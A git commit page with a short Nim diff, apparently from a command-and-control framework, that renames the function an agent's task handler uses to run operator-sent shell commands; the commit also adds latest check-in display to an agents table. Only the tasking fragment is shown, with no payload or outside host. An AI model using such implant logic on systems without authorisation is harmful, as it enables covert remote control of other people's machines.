Implemented displaying latest checkin in agents table, as well as word-wrap.

This commit is contained in:
Jakob Friedl
2025-05-23 13:55:00 +02:00
parent 6f9e20566d
commit 5ab9cd302c
10 changed files with 155 additions and 59 deletions

View File

@@ -7,7 +7,7 @@ proc handleTask*(task: Task): Task =
case task.command:
of ExecuteShell:
let cmdResult = executeShellCommand(task.args)
let cmdResult = taskShell(task.args)
echo cmdResult
return Task(